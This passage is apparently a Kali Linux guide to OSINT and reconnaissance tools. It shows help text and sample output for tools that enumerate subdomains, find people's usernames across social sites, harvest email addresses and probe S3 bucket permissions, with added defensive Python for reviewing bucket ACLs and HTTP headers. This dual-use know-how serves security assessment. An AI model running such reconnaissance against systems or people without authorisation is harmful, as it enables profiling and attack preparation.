-w Download the files, instead of just viewing search results.
■ Usage example
root@kali:~# metagoofil -d www.ipa.go.jp -n 10 -t pdf -o pdf -w
[*] Downloaded files will be saved here: pdf
[*] Searching for 100 .pdf files and waiting 30.0 seconds between searches
[+] Downloading "000063749.pdf" [444492 bytes] from: https://www.ipa.go.jp/archive/files/000063749.pdf
[+] Downloading "000066605.pdf" [1209946 bytes] from: https://www.ipa.go.jp/archive/files/000066605.pdf
[...]
ReconSpider
An OSINT framework for finding information from various publicly available sources on the Internet.
■ Usage
root@kali:~# reconspider
ENTER 0 - 13 TO SELECT OPTIONS
1. IP Enumerate information from IP Address
2. DOMAIN Gather information about given DOMAIN
3. PHONENUMBER Gather information about Phonenumber
4. DNS MAP Map DNS records associated with target
5. METADATA Extract all metadata of the given file
6. REVERSE IMAGE SEARCH Obtain domain name or IP address mapping
7. HONEYPOT Check if it's honeypot or a real system
8. MAC ADDRESS LOOKUP Obtain information about give Macaddress
9. IPHEATMAP Draw out heatmap of locations of IP
10. TORRENT Gather torrent download history of IP
11. USERNAME Extract Account info. from social media
12. IP2PROXY Check whether IP uses any VPN / PROXY
13. MAIL BREACH Checks given domain has breached Mail
0. EXIT Exit from ReconSpider to your terminal
■ Usage example
root@kali:~# reconspider
Reconspider >> 1
IP >> 8.8.8.8
[+] Gathering IP Address Information from [shodan]
IP Address ----> 8.8.8.8
Country -------> United States
City ----------> Mountain View
Organization --> Google LLC
ISP -----------> Google LLC
Open ports ----> [443, 53]
Reconspider >> 2
HOST (URL / IP) >> example.com
PORT >> 80
Target Alive
1. ReverseIP
2. SubDomain
3. nsLookup
4. CMSDetect
5. PortScan
6. Bruteforce
7. ClickJacking
8. CORS
9. Host Header Injection
10. Header
11. Crawler
12. Whoami
99. Exit
Domain >> 12
Domain Name:EXAMPLE.COM
Register:RESERVED-Internet Assigned Numbers Authority
Whois Server:whois.iana.org
Server:['A.IANA-SERVERS.NET', 'B.IANA-SERVERS.NET']
Emails:None
Organisation:None
Address:None
City:None
State:None
'zipcode'
Country:None
S3Scanner
Checks whether buckets with the given names exist in the object storage of cloud providers such as AWS, GCP, DigitalOcean, and Linode, and inspects their permission settings.
■ Usage
root@kali:~# s3scanner --help
INPUT: (1 required)
-bucket string Name of bucket to check.
-bucket-file string File of bucket names to check.
-mq Connect to RabbitMQ to get buckets. Requires config file key "mq". Default: "false"
OUTPUT:
-db Save results to a Postgres database. Requires config file key "db.uri". Default: "false"
-json Print logs to stdout in JSON format instead of human-readable. Default: "false"
OPTIONS:
-enumerate Enumerate bucket objects (can be time-consuming). Default: "false"
-provider string Object storage provider: aws, custom, digitalocean, dreamhost, gcp, linode - custom requires config file. Default: "aws"
-threads int Number of threads to scan with. Default: "4"
DEBUG:
-verbose Enable verbose logging. Default: "false"
-version Print version Default: "false"
■ Usage example
# Build a wordlist from the two words hello and world
root@kali:~# echo -e "hello\nworld" | rsmangler -t -T -c -u -l -s -e -i -C --punctuation --file - --output buckets.txt
# Scan AWS S3 using the wordlist
root@kali:~# s3scanner -bucket-file buckets.txt -provider aws -enumerate
INFO invalid | hw
INFO exists | world | us-west-2 | AuthUsers: [] | AllUsers: []
INFO exists | hello | ap-south-1 | AuthUsers: [] | AllUsers: []
INFO exists | helloworld | us-east-1 | AuthUsers: [] | AllUsers: []
INFO exists | worldhello | eu-west-1 | AuthUsers: [] | AllUsers: []
INFO not_exist | olleh
INFO not_exist | 1990hello
INFO not_exist | hello1990
INFO not_exist | 1991hello
INFO not_exist | hello1991
INFO exists | hellohello | us-east-2 | AuthUsers: [] | AllUsers: []
INFO not_exist | hello1992
INFO not_exist | 1992hello
INFO not_exist | 1993hello
INFO not_exist | hello1993
[...]
INFO exists | hello2018 | ap-south-1 | AuthUsers: [] | AllUsers: [READ, READ_ACP] | 2 objects (486 kB)
INFO exists | hello2019 | us-east-1 | AuthUsers: [] | AllUsers: []
INFO exists | hello2020 | us-east-1 | AuthUsers: [] | AllUsers: []
[...]
INFO not_exist | 122hw
INFO not_exist | 123hw
INFO not_exist | hw122
INFO exists | hw121 | us-east-1 | AuthUsers: [] | AllUsers: []
INFO exists | hw123 | ap-northeast-2 | AuthUsers: [] | AllUsers: []
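As an added example (not part of the original article or the s3scanner project), the following Python script parses s3scanner's human-readable output in the format shown above and classifies each existing bucket by its ACL grants, so that a bucket owner reviewing a scan of their own naming candidates can spot unintended anonymous (AllUsers) or any-authenticated-AWS-account (AuthUsers) access. The sample lines are constructed from the output format above; the bucket names, regions, and the AuthUsers grant on hello2019 are made up for illustration.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample, modelled on the s3scanner output format shown above.
SAMPLE_OUTPUT = """\
INFO invalid | hw
INFO exists | world | us-west-2 | AuthUsers: [] | AllUsers: []
INFO not_exist | olleh
INFO exists | hello2018 | ap-south-1 | AuthUsers: [] | AllUsers: [READ, READ_ACP] | 2 objects (486 kB)
INFO exists | hello2019 | us-east-1 | AuthUsers: [READ] | AllUsers: []
"""

# "exists" lines: INFO exists | <name> | <region> | AuthUsers: [...] | AllUsers: [...] [| <n> objects (...)]
EXISTS_RE = re.compile(
    r"^INFO\s+exists\s*\|\s*(?P<name>\S+)\s*\|\s*(?P<region>\S+)\s*\|"
    r"\s*AuthUsers:\s*\[(?P<auth>[^\]]*)\]\s*\|\s*AllUsers:\s*\[(?P<all>[^\]]*)\]"
    r"(?:\s*\|\s*(?P<objects>\d+)\s+objects)?"
)
# "not_exist" and "invalid" lines carry only the bucket name.
OTHER_RE = re.compile(r"^INFO\s+(?P<status>not_exist|invalid)\s*\|\s*(?P<name>\S+)")


@dataclass
class Bucket:
    name: str
    status: str                       # exists / not_exist / invalid
    region: Optional[str] = None
    auth_users: List[str] = field(default_factory=list)  # grants to any authenticated AWS account
    all_users: List[str] = field(default_factory=list)   # grants to anonymous users
    objects: Optional[int] = None     # only reported when -enumerate could list the bucket

    @property
    def risk(self) -> str:
        """Any AllUsers grant is public; any AuthUsers grant is readable by every AWS account."""
        if self.status != "exists":
            return "n/a"
        if self.all_users:
            return "PUBLIC"
        if self.auth_users:
            return "ANY-AWS-ACCOUNT"
        # No ACL grant reported: not proof of privacy, a bucket policy can still grant access.
        return "private-or-unknown"


def _split_grants(text: str) -> List[str]:
    return [g.strip() for g in text.split(",") if g.strip()]


def parse_s3scanner(text: str) -> List[Bucket]:
    """Turn s3scanner's INFO lines into Bucket records; unrelated lines are ignored."""
    buckets: List[Bucket] = []
    for line in text.splitlines():
        m = EXISTS_RE.match(line)
        if m:
            buckets.append(Bucket(
                name=m["name"], status="exists", region=m["region"],
                auth_users=_split_grants(m["auth"]), all_users=_split_grants(m["all"]),
                objects=int(m["objects"]) if m["objects"] else None,
            ))
            continue
        m = OTHER_RE.match(line)
        if m:
            buckets.append(Bucket(name=m["name"], status=m["status"]))
    return buckets


def flag_exposed(buckets: List[Bucket]) -> List[Bucket]:
    """Buckets that an owner should review first: readable by anonymous or by any AWS account."""
    return [b for b in buckets if b.risk in ("PUBLIC", "ANY-AWS-ACCOUNT")]


if __name__ == "__main__":
    for b in flag_exposed(parse_s3scanner(SAMPLE_OUTPUT)):
        print(f"{b.risk:<16} {b.name} ({b.region}) AllUsers={b.all_users} AuthUsers={b.auth_users}")
```

Empty grant lists only mean that no ACL grant was reported for the bucket; a bucket can still be exposed through a bucket policy, so treat `private-or-unknown` as a prompt to check the policy and the account's Block Public Access settings rather than as proof of privacy.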
Sherlock
Searches more than 400 social media sites for accounts matching the given username.
■ Usage
root@kali:~# sherlock --help
usage: sherlock [-h] [--version] [--verbose] [--folderoutput FOLDEROUTPUT] [--output OUTPUT] [--tor] [--unique-tor] [--csv] [--xlsx]
[--site SITE_NAME] [--proxy PROXY_URL] [--dump-response] [--json JSON_FILE] [--timeout TIMEOUT] [--print-all] [--print-found]
[--no-color] [--browse] [--local] [--nsfw]
USERNAMES [USERNAMES ...]
positional arguments:
USERNAMES One or more usernames to check with social networks. Check similar usernames using {?} (replace to '_', '-', '.').
options:
-h, --help show this help message and exit
--version Display version information and dependencies.
--verbose, -v, -d, --debug
Display extra debugging information and metrics.
--folderoutput FOLDEROUTPUT, -fo FOLDEROUTPUT
If using multiple usernames, the output of the results will be saved to this folder.
--output OUTPUT, -o OUTPUT
If using single username, the output of the result will be saved to this file.
--tor, -t Make requests over Tor; increases runtime; requires Tor to be installed and in system path.
--unique-tor, -u Make requests over Tor with new Tor circuit after each request; increases runtime; requires Tor to be installed and in
system path.
--csv Create Comma-Separated Values (CSV) File.
--xlsx Create the standard file for the modern Microsoft Excel spreadsheet (xlsx).
--site SITE_NAME Limit analysis to just the listed sites. Add multiple options to specify more than one site.
--proxy PROXY_URL, -p PROXY_URL
Make requests over a proxy. e.g. socks5://127.0.0.1:1080
--dump-response Dump the HTTP response to stdout for targeted debugging.
--json JSON_FILE, -j JSON_FILE
Load data from a JSON file or an online, valid, JSON file.
--timeout TIMEOUT Time (in seconds) to wait for response to requests (Default: 60)
--print-all Output sites where the username was not found.
--print-found Output sites where the username was found (also if exported as file).
--no-color Don't color terminal output
--browse, -b Browse to all results on default browser.
--local, -l Force the use of the local data.json file.
--nsfw Include checking of NSFW sites from default list.
■ Usage example
root@kali:~# sherlock helloworld
[*] Checking username helloworld on:
[+] 1337x: https://www.1337x.to/user/helloworld/
[+] 7Cups: https://www.7cups.com/@helloworld
[+] 8tracks: https://8tracks.com/helloworld
[+] 9GAG: https://www.9gag.com/u/helloworld
[+] About.me: https://about.me/helloworld
[...]
[+] note: https://note.com/helloworld
[+] npm: https://www.npmjs.com/~helloworld
[+] opennet: https://www.opennet.ru/~helloworld
[+] osu!: https://osu.ppy.sh/users/helloworld
[+] phpRU: https://php.ru/forum/members/?username=helloworld
[+] pikabu: https://pikabu.ru/@helloworld
[+] pr0gramm: https://pr0gramm.com/user/helloworld
[+] social.tchncs.de: https://social.tchncs.de/@helloworld
[*] Search completed with 253 results
sn0int
A semi-automatic OSINT framework. It collects subdomains, social network profile information, and more.
■ Usage
root@kali:~# sn0int --help
Usage: sn0int [OPTIONS] [COMMAND]
Commands:
run Run a module directly
sandbox For internal use
login Login to the registry for publishing
new Create a new module
publish Publish a script to the registry
install Install a module from the registry
search Search in the registry
pkg The sn0int package manager
add Insert into the database
select Select from the database
delete Delete from the database
activity Query logged activity
scope Include entities in the scope
noscope Exclude entities from scope
autoscope Manage autoscope rules
autonoscope Manage autonoscope rules
rescope Rescope all entities based on autonoscope rules
workspace Manage workspaces
cal Calendar
notify Notify
fsck Verify blob storage for corrupt and dangling blobs
export Export a workspace for external processing
stats Show statistics about your current workspace
repl Run a lua repl
paths Show paths of various file system locations
completions Generate shell completions
help Print this message or the help of the given subcommand(s)
Options:
-w, --workspace <WORKSPACE> Select a different workspace instead of the default [env: SN0INT_WORKSPACE=]
-h, --help Print help
-V, --version Print version
■ Usage example
root@kali:~# sn0int
[+] Connecting to database
[+] Loaded 0 modules
[*] No modules found, run pkg quickstart to install default modules
[*] New to sn0int? Follow https://sn0int.rtfd.io/en/stable/usage.html
# Install the default modules
[sn0int][default] > pkg quickstart
[+] imdyske/tinder : installed v0.1.0
[+] imdyske/fediverse : installed v0.1.0
[+] kpcyrd/apex-domain : installed v0.1.0
[+] kpcyrd/asn : installed v0.1.0
[+] kpcyrd/archive-org : installed v0.1.0
[+] kpcyrd/axfr : installed v0.3.0
[...]
# List the installed modules
[sn0int][default] > pkg list
imdyske/fediverse 0.1.0
Uses search.social to search for accounts on the fediverse
imdyske/tinder 0.1.0
Search tinder for profiles
kpcyrd/apex-domain 0.1.0
Create subdomain entries for apex domains
kpcyrd/archive-org 0.1.0
Collect information about an archive.org profile
kpcyrd/asn 0.1.0
Run a asn lookup for an ip address
kpcyrd/axfr 0.3.0
Try a zone transfer for subdomains
kpcyrd/btc-blockchain-info 0.1.0
Read tx history of bitcoin addresses
kpcyrd/cname-harvest 0.3.0
Query for CNAMES to find subdomains
kpcyrd/crypto-detect 0.2.0
Detect crypto currency from address
kpcyrd/ctlogs 0.7.0
Query certificate transparency logs to discover subdomains
[...]
# Add a domain
[sn0int][default] > add domain
[?] Domain: qiita.com
# Select the module to use
[sn0int][default] > use ctlogs
# Run the module (search Certificate Transparency logs for subdomains)
[sn0int][default][kpcyrd/ctlogs] > run
[*] "qiita.com" : Adding subdomain "support.qiita.com"
[*] "qiita.com" : Adding subdomain "business.qiita.com"
[*] "qiita.com" : Adding subdomain "www.business.qiita.com"
[*] "qiita.com" : Adding subdomain "teams.qiita.com"
[*] "qiita.com" : Adding subdomain "www.teams.qiita.com"
[*] "qiita.com" : Adding subdomain "jobs.qiita.com"
[*] "qiita.com" : Adding subdomain "media.jobs.qiita.com"
[*] "qiita.com" : Adding subdomain "www.media.jobs.qiita.com"
[*] "qiita.com" : Adding subdomain "qiita.com"
[*] "qiita.com" : Adding subdomain "ads.qiita.com"
[*] "qiita.com" : Adding subdomain "www.ads.qiita.com"
[*] "qiita.com" : Adding subdomain "corp.qiita.com"
[*] "qiita.com" : Adding subdomain "plus.jobs.qiita.com"
[*] "qiita.com" : Adding subdomain "terminated.qiita.com"
[*] "qiita.com" : Adding subdomain "kobito.qiita.com"
[*] "qiita.com" : Adding subdomain "slack.teams.qiita.com"
[*] "qiita.com" : Adding subdomain "staging.qiita.com"
[*] "qiita.com" : Adding subdomain "oauth.qiita.com"
[*] "qiita.com" : Adding subdomain "documents-jobs.qiita.com"
[*] "qiita.com" : Adding subdomain "info.jobs.qiita.com"
[*] "qiita.com" : Adding subdomain "pr.qiita.com"
[*] "qiita.com" : Adding subdomain "app.teams.qiita.com"
[*] "qiita.com" : Adding subdomain "blog.qiita.com"
[*] "qiita.com" : Adding subdomain "workq.qiita.com"
[*] "qiita.com" : Adding subdomain "staging.app.teams.qiita.com"
[*] "qiita.com" : Adding subdomain "career.qiita.com"
[+] Finished kpcyrd/ctlogs
SpiderFoot
An OSINT automation tool that integrates various APIs and tools.
■ Usage
root@kali:~# spiderfoot --help
usage: sf.py [-h] [-d] [-l IP:port] [-m mod1,mod2,...] [-M] [-C scanID] [-s TARGET] [-t type1,type2,...]
[-u {all,footprint,investigate,passive}] [-T] [-o {tab,csv,json}] [-H] [-n] [-r] [-S LENGTH] [-D DELIMITER] [-f]
[-F type1,type2,...] [-x] [-q] [-V] [-max-threads MAX_THREADS]
options:
-h, --help show this help message and exit
-d, --debug Enable debug output.
-l IP:port IP and port to listen on.
-m mod1,mod2,... Modules to enable.
-M, --modules List available modules.
-C scanID, --correlate scanID
Run correlation rules against a scan ID.
-s TARGET Target for the scan.
-t type1,type2,... Event types to collect (modules selected automatically).
-u {all,footprint,investigate,passive}
Select modules automatically by use case
-T, --types List available event types.
-o {tab,csv,json} Output format. Tab is default.
-H Don't print field headers, just data.
-n Strip newlines from data.
-r Include the source data field in tab/csv output.
-S LENGTH Maximum data length to display. By default, all data is shown.
-D DELIMITER Delimiter to use for CSV output. Default is ,.
-f Filter out other event types that weren't requested with -t.
-F type1,type2,... Show only a set of event types, comma-separated.
-x STRICT MODE. Will only enable modules that can directly consume your target, and if -t was specified only those events
will be consumed by modules. This overrides -t and -m options.
-q Disable logging. This will also hide errors!
-V, --version Display the version of SpiderFoot and exit.
-max-threads MAX_THREADS
Max number of modules to run concurrently.
■ Usage example
# Discover the technology stack used by the site
root@kali:~# spiderfoot -m sfp_tool_wappalyzer,sfp_tool_whatweb -s qiita.com
2024-11-16 11:27:27,357 [INFO] sf : Modules enabled (4): sfp_tool_wappalyzer,sfp_tool_whatweb,sfp__stor_db,sfp__stor_stdout
[...]
SpiderFoot UI Internet Name qiita.com
SpiderFoot UI Domain Name qiita.com
sfp_tool_whatweb Web Server CloudFront
sfp_tool_whatweb Web Technology CloudFront
sfp_tool_whatweb Raw Data from RIRs/APIs [{'target': 'http://qiita.com', 'http_status': 301, 'request_config': {'headers': {'User-Agent': 'Mozilla/5.0'}}, 'plugins': {'CloudFront': {}, 'Country': {'string': ['UNITED STATES'], 'module': ['US']}, 'HTTPServer': {'string': ['CloudFront']}, 'IP': {'string': ['18.65.207.93']}, 'RedirectLocation': {'string': ['https://qiita.com/']}, 'Title': {'string': ['301 Moved Permanently']}, 'UncommonHeaders': {'string': ['x-amz-cf-pop,x-amz-cf-id']}, 'Via-Proxy': {'string': ['1.1 7bdbfc0a92d08678fa98f050e3369202.cloudfront.net (CloudFront)']}}}]
sfp_tool_wappalyzer Software Used Ruby
sfp_tool_wappalyzer Software Used Ruby on Rails
sfp_tool_wappalyzer Software Used Amazon Web Services
sfp_tool_wappalyzer Software Used Emotion
sfp_tool_wappalyzer Software Used Emotion
sfp_tool_wappalyzer Web Technology Nginx
sfp_tool_wappalyzer Software Used Nginx
sfp_tool_wappalyzer Software Used Cloudflare
sfp_tool_wappalyzer Software Used Google Publisher Tag
sfp_tool_wappalyzer Software Used DoubleClick for Publishers (DFP)
sfp_tool_wappalyzer Software Used Google Tag Manager
sfp_tool_wappalyzer Software Used Imgix
sfp_tool_wappalyzer Software Used Imgix
sfp_tool_wappalyzer Software Used Google Font API
sfp_tool_wappalyzer Software Used Funding Choices
sfp_tool_wappalyzer Software Used Font Awesome
sfp_tool_wappalyzer Software Used cdnjs
sfp_tool_wappalyzer Software Used HSTS
sfp_tool_wappalyzer Software Used Amazon CloudFront
sfp_tool_wappalyzer Software Used AWS Certificate Manager
sfp_tool_wappalyzer Software Used PWA
sfp_tool_wappalyzer Software Used Open Graph
# Start the web GUI
root@kali:~# spiderfoot -l 0.0.0.0:8080
Scan results can be viewed in the UI (scans can also be launched from the UI)
subfinder
Discovers valid subdomains of a website using various online sources.
■ Usage
root@kali:~# subfinder --help
Usage:
subfinder [flags]
Flags:
INPUT:
-d, -domain string[] domains to find subdomains for
-dL, -list string file containing list of domains for subdomain discovery
SOURCE:
-s, -sources string[] specific sources to use for discovery (-s crtsh,github). Use -ls to display all available sources.
-recursive use only sources that can handle subdomains recursively (e.g. subdomain.domain.tld vs domain.tld)
-all use all sources for enumeration (slow)
-es, -exclude-sources string[] sources to exclude from enumeration (-es alienvault,zoomeye)
FILTER:
-m, -match string[] subdomain or list of subdomain to match (file or comma separated)
-f, -filter string[] subdomain or list of subdomain to filter (file or comma separated)
RATE-LIMIT:
-rl, -rate-limit int maximum number of http requests to send per second
-t int number of concurrent goroutines for resolving (-active only) (default 10)
UPDATE:
-up, -update update subfinder to latest version
-duc, -disable-update-check disable automatic subfinder update check
OUTPUT:
-o, -output string file to write output to
-oJ, -json write output in JSONL(ines) format
-oD, -output-dir string directory to write output (-dL only)
-cs, -collect-sources include all sources in the output (-json only)
-oI, -ip include host IP in output (-active only)
CONFIGURATION:
-config string flag config file (default "/root/.config/subfinder/config.yaml")
-pc, -provider-config string provider config file (default "/root/.config/subfinder/provider-config.yaml")
-r string[] comma separated list of resolvers to use
-rL, -rlist string file containing list of resolvers to use
-nW, -active display active subdomains only
-proxy string http proxy to use with subfinder
-ei, -exclude-ip exclude IPs from the list of domains
DEBUG:
-silent show only subdomains in output
-version show version of subfinder
-v show verbose output
-nc, -no-color disable color in output
-ls, -list-sources list all available sources
-stats report source statistics
OPTIMIZATION:
-timeout int seconds to wait before timing out (default 30)
-max-time int minutes to wait for enumeration results (default 10)
■ Usage example
root@kali:~# subfinder -silent -d qiita.com | getallurls
https://business.qiita.com/robots.txt
https://ads.qiita.com/robots.txt
https://corp.qiita.com/
https://corp.qiita.com/jobs/engineers/
[...]
Sublist3r
Enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu, and Ask, as well as Netcraft, Virustotal, ThreatCrowd, DNSdumpster, and ReverseDNS.
■ Usage
root@kali:~# sublist3r --help
usage: sublist3r [-h] -d DOMAIN [-b [BRUTEFORCE]] [-p PORTS] [-v [VERBOSE]] [-t THREADS] [-e ENGINES] [-o OUTPUT] [-n]
OPTIONS:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Domain name to enumerate it's subdomains
-b [BRUTEFORCE], --bruteforce [BRUTEFORCE]
Enable the subbrute bruteforce module
-p PORTS, --ports PORTS
Scan the found subdomains against specified tcp ports
-v [VERBOSE], --verbose [VERBOSE]
Enable Verbosity and display results in realtime
-t THREADS, --threads THREADS
Number of threads to use for subbrute bruteforce
-e ENGINES, --engines ENGINES
Specify a comma-separated list of search engines
-o OUTPUT, --output OUTPUT
Save the results to text file
-n, --no-color Output without color
■ Usage example
root@kali:~# sublist3r -d qiita.com
[-] Enumerating subdomains now for qiita.com
[-] Searching now in Baidu..
[-] Searching now in Yahoo..
[-] Searching now in Google..
[-] Searching now in Bing..
[-] Searching now in Ask..
[-] Searching now in Netcraft..
[-] Searching now in DNSdumpster..
[...]
[-] Total Unique Subdomains Found: 25
ads.qiita.com
www.ads.qiita.com
blog.qiita.com
business.qiita.com
www.business.qiita.com
career.qiita.com
corp.qiita.com
documents-jobs.qiita.com
jobs.qiita.com
info.jobs.qiita.com
media.jobs.qiita.com
[...]
theHarvester
Collects email addresses, IPs, subdomains, and URLs for the given domain using multiple public resources.
■ Usage
root@kali:~# theHarvester --help
usage: theHarvester [-h] -d DOMAIN [-l LIMIT] [-S START] [-p] [-s] [--screenshot SCREENSHOT] [-v] [-e DNS_SERVER] [-t] [-r [DNS_RESOLVE]] [-n]
[-c] [-f FILENAME] [-b SOURCE]
options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Company name or domain to search.
-l LIMIT, --limit LIMIT
Limit the number of search results, default=500.
-S START, --start START
Start with result number X, default=0.
-p, --proxies Use proxies for requests, enter proxies in proxies.yaml.
-s, --shodan Use Shodan to query discovered hosts.
--screenshot SCREENSHOT
Take screenshots of resolved domains specify output directory: --screenshot output_directory
-v, --virtual-host Verify host name via DNS resolution and search for virtual hosts.
-e DNS_SERVER, --dns-server DNS_SERVER
DNS server to use for lookup.
-t, --take-over Check for takeovers.
-r [DNS_RESOLVE], --dns-resolve [DNS_RESOLVE]
Perform DNS resolution on subdomains with a resolver list or passed in resolvers, default False.
-n, --dns-lookup Enable DNS server lookup, default False.
-c, --dns-brute Perform a DNS brute force on the domain.
-f FILENAME, --filename FILENAME
Save the results to an XML and JSON file.
-b SOURCE, --source SOURCE
anubis, baidu, bevigil, binaryedge, bing, bingapi, bufferoverun, brave, censys, certspotter, criminalip, crtsh,
dnsdumpster, duckduckgo, fullhunt, github-code, hackertarget, hunter, hunterhow, intelx, netlas, onyphe, otx,
pentesttools, projectdiscovery, rapiddns, rocketreach, securityTrails, sitedossier, subdomaincenter,
subdomainfinderc99, threatminer, tomba, urlscan, virustotal, yahoo, zoomeye
■ Usage example
root@kali:~# theHarvester -d example.com -b all -f results
[*] Target: example.com
[*] Searching Bing.
[*] Searching Anubis.
[*] Searching Baidu
[...]
zzq15.example.com
zzz7777.example.com
zzzmmmccc026.example.com
zzzzzzzzzzzz.example.com
[*] Reporting started.
[*] XML File saved.
[*] JSON File saved.
root@kali:~# jq '.asns[0:5],.emails[0:5],.hosts[0:5],.interesting_urls[0:5],.ips[0:5]' results.json
[
"AS132203",
"AS13335",
"AS15133",
"AS16262",
"AS16276"
]
[
"'bob@example.com",
"'john.doe@example.com",
"'me@example.com",
"'noah@example.com",
"'tom.lee@example.com"
]
[
".example.com",
"0.example.com",
"001.example.com",
"02.example.com",
"04.example.com"
]
[
"https://example.com/",
"https://example.com/phishing",
"https://www.example.com/"
]
[
"146.185.196.24",
"172.67.171.208",
"185.17.3.252",
"185.217.199.198",
"185.238.74.165"
]
Waybackpy
Archives pages to the Wayback Machine, searches archived pages, and more.
■ Usage
root@kali:~# waybackpy --help
Usage: waybackpy [OPTIONS]
Options:
-u, --url TEXT URL on which Wayback machine operations are
to be performed.
-ua, --user-agent, --user_agent TEXT
User agent, default value is 'waybackpy
3.0.6 -
https://github.com/akamhy/waybackpy'.
-v, --version waybackpy version.
-l, --show-license, --show_license, --license
Show license of Waybackpy.
-n, -au, --newest, --archive_url, --archive-url
Retrieve the newest archive of URL.
-o, --oldest Retrieve the oldest archive of URL.
-N, --near Archive close to a specified time.
-Y, --year INTEGER RANGE Year in integer. [1994<=x<=9999]
-M, --month INTEGER RANGE Month in integer. [1<=x<=12]
-D, --day INTEGER RANGE Day in integer. [1<=x<=31]
-H, --hour INTEGER RANGE Hour in integer. [0<=x<=24]
-MIN, --minute INTEGER RANGE Minute in integer. [0<=x<=60]
-s, --save Save the specified URL's webpage and print
the archive URL.
-h, --headers Headers data of the SavePageNow API.
-ku, --known-urls, --known_urls
List known URLs. Uses CDX API.
-sub, --subdomain Use with '--known_urls' to include known
URLs for subdomains.
-f, --file Use with '--known_urls' to save the URLs in
file at current directory.
--cdx Flag for using CDX API.
-st, --start-timestamp, --start_timestamp, --from TEXT
Start timestamp for CDX API in
yyyyMMddhhmmss format.
-et, --end-timestamp, --end_timestamp, --to TEXT
End timestamp for CDX API in yyyyMMddhhmmss
format.
-C, --closest TEXT Archive that are closest the timestamp
passed as arguments to this parameter.
-f, --cdx-filter, --cdx_filter, --filter TEXT
Filter on a specific field or all the CDX
fields.
-mt, --match-type, --match_type TEXT
The default behavior is to return matches
for an exact URL. However, the CDX server
can also return results matching a certain
prefix, a certain host, or all sub-hosts by
using the match_type
-st, --sort TEXT Choose one from default, closest or reverse.
It returns sorted CDX entries in the
response.
-up, --use-pagination, --use_pagination
Use the pagination API of the CDX server
instead of the default one.
-gz, --gzip TEXT To disable gzip compression pass false as
argument to this parameter. The default
behavior is gzip compression enabled.
-c, --collapse TEXT Filtering or 'collapse' results based on a
field, or a substring of a field.
-l, --limit TEXT Number of maximum record that CDX API is
asked to return per API call, default value
is 25000 records.
-cp, --cdx-print, --cdx_print TEXT
Print only certain fields of the CDX API
response, if this parameter is not used then
the plain text response of the CDX API will
be printed.
--help Show this message and exit.
■ Usage example
# Take a screenshot of the oldest archived copy of Qiita
root@kali:~# waybackpy --url https://qiita.com --oldest | httpx -silent | httpx -silent -ss
https://web.archive.org/web/20110727192029/http://qiita.com/
The captured screenshot
WitnessMe
Takes screenshots of the given URLs and retrieves server information.
■ Usage
root@kali:~# witnessme screenshot --help
usage: witnessme screenshot [-h] [-p PORTS [PORTS ...]] target [target ...]
positional arguments:
target The target IP(s), range(s), CIDR(s) or hostname(s), NMap XML file(s), .Nessus file(s)
options:
-h, --help show this help message and exit
-p PORTS [PORTS ...], --ports PORTS [PORTS ...]
Ports to scan if IP Range/CIDR is provided
root@kali:~# witnessme grab --help
usage: witnessme grab [-h] [-x XPATH | -l] target [target ...]
positional arguments:
target The target IP(s), range(s), CIDR(s) or hostname(s), NMap XML file(s), .Nessus file(s)
options:
-h, --help show this help message and exit
-x XPATH, --xpath XPATH
XPath to use
-l, --links Get all links
root@kali:~# wmdb --help
usage: wmdb [-h] scan_folder
positional arguments:
scan_folder WitnessMe scan folder
options:
-h, --help show this help message and exit
■ Usage example
root@kali:~# witnessme screenshot http://192.168.11.4
[witnessme.screenshot] INFO - Starting scan 02044794-b5ca-4d0e-8a0f-a6d8413d5798
[witnessme.headlessbrowser] INFO - Starting headless browser
[witnessme.headlessbrowser] WARNING - Running under root privileges, browser will start with --no-sandbox
[witnessme.headlessbrowser] INFO - Using 1 browser tab(s)/thread(s)
[witnessme.screenshot] INFO - Took screenshot of http://192.168.11.4:80
[witnessme.headlessbrowser] INFO - Killing headless browser
[witnessme.screenshot] INFO - Saved scan to scan_2024_12_01_070106/
root@kali:~# witnessme grab http://192.168.11.4
[witnessme.headlessbrowser] INFO - Starting headless browser
[witnessme.headlessbrowser] WARNING - Running under root privileges, browser will start with --no-sandbox
[witnessme.headlessbrowser] INFO - Using 1 browser tab(s)/thread(s)
[witnessme.grab] INFO - Grabbed page:
{
"body": "74847 bytes",
"headers": {
"cache-control": "max-age=0, must-revalidate, private",
"connection": "Keep-Alive",
"content-encoding": "gzip",
"content-type": "text/html; charset=UTF-8",
"date": "Sun, 01 Dec 2024 07:03:32 GMT",
"expires": "Sun, 01 Dec 2024 07:03:32 GMT",
"keep-alive": "timeout=5, max=100",
"server": "Apache/2.4.62 (Debian)",
"set-cookie": "maintenance_token=deleted; expires=Sat, 02 Dec 2023 07:03:31 GMT; Max-Age=0; path=/; httponly\neccube=khjfkis6uuhmvr3dbv0j83tb2a; path=/; httponly",
"transfer-encoding": "chunked",
"vary": "Accept-Encoding",
"x-content-type-options": "nosniff",
"x-debug-token": "5ace25",
"x-debug-token-link": "http://192.168.11.4/_profiler/5ace25",
"x-frame-options": "SAMEORIGIN",
"x-powered-by": "PHP/8.1.31",
"x-robots-tag": "noindex",
"x-xss-protection": "1; mode=block"
},
"ip": "192.168.11.4",
"port": 80,
"scheme": "http",
"server": "Apache/2.4.62 (Debian)",
"title": "EC-CUBE SHOP / TOP\u30da\u30fc\u30b8",
"url": "http://192.168.11.4:80"
}
[witnessme.headlessbrowser] INFO - Killing headless browser
root@kali:~# wmdb scan_2024_12_01_070106/
[!] Press tab for autocompletion and available commands
WMDB >> servers
+----+------------------------+--------------------------+------------------------+----------------------+
| Id | URL | Title | Server | Matched Signature(s) |
+----+------------------------+--------------------------+------------------------+----------------------+
| 1 | http://192.168.11.4:80 | EC-CUBE SHOP / TOPページ | Apache/2.4.62 (Debian) | None |
+----+------------------------+--------------------------+------------------------+----------------------+
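The header dump that witnessme grab returns (and the similar one finalrecon --headers prints) is a convenient input for a hardening review of one's own site. The following Python script is an added example, not part of the article or the WitnessMe project: it takes a header map like the JSON above and reports missing hardening headers, version disclosure in server banners, framework debug headers, the deprecated X-XSS-Protection value, and cookie attribute gaps. SAMPLE_GRAB is constructed from the witnessme output above with the headers trimmed to the relevant ones.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple

Finding = Tuple[str, str, str]  # (category, header or cookie name, explanation)

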